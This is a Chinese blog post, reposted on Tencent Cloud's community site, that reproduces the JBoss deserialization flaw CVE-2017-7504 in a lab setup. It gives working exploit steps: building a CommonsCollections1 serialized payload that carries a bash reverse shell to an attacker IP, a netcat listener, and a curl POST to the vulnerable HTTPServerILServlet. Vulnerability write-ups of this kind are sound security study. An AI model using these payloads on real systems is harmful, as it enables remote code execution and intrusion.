前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >JBOSS反序列化漏洞复现(CVE-2017-7504)

JBOSS反序列化漏洞复现(CVE-2017-7504)

作者头像
R0A1NG
发布2022-02-19 10:16:51
1.7K0
发布2022-02-19 10:16:51
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

原理

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响版本

JBoss AS 4.x及之前版本

漏洞复现

攻击机:xx.xx.xx.xx

靶机:x.x.x.x

靶机搭建和exp工具-->https://cloud.tencent.com/developer/article/1944746

反弹shell

编译并生成序列化数据,生成ExampleCommonsCollections1WithHashMap.class文件

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

序列化恶意数据至文件,生成ExampleCommonsCollections1WithHashMap.ser文件

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/xx.xx.xx.xx/9963 0>&1" 注:xx.xx.xx.xx是攻击者IP,端口为反弹shell端口

攻击机监听9963端口

nc -lvnp 9963

ExampleCommonsCollections1WithHashMap.ser发送到靶机

curl http://http://x.x.x.x:9700/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser --data-binary 以二进制的方式post数据

发送成功,获取反弹shell。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 11 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 原理
  • 影响版本
  • 漏洞复现
相关产品与服务
文件存储
文件存储(Cloud File Storage,CFS)为您提供安全可靠、可扩展的共享文件存储服务。文件存储可与腾讯云服务器、容器服务、批量计算等服务搭配使用,为多个计算节点提供容量和性能可弹性扩展的高性能共享存储。腾讯云文件存储的管理界面简单、易使用,可实现对现有应用的无缝集成;按实际用量付费,为您节约成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档